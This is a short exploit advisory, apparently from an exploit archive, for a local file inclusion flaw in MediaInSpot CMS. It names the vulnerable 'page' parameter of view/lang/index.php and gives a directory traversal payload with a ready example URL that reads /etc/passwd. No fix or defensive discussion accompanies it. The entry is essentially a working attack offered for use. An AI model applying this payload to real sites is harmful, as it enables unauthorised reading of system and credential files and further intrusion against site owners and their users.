id: 11714
date: 04/11/2010
title: MediaInSpot CMS LFI Vulnerability
author: Amoo Arash
cves: 

=================================
MediaInSpot CMS LFI Vulnerability
=================================

# Title : MediaInSpot CMS LFI Vulnerability
# Author: Amoo Arash
 
[~]######################################### InformatioN #############################################[~]
 
[~] Title : MediaInSpot CMS LFI Vulnerability
[~] Author : Amoo Arash
 
[~]######################################### ExploiT #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/view/lang/index.php?page=?page=[LFI]
 
[~] ExploiT :
 
../../../../../../../etc/passwd
 
[~] Example :
 
http://127.0.0.1/view/lang/index.php?page=?page=../../../../../../../etc/passwd
 
 
[~]######################################### FinisH :D #############################################[~]



#  0day.today [2023-03-21]  #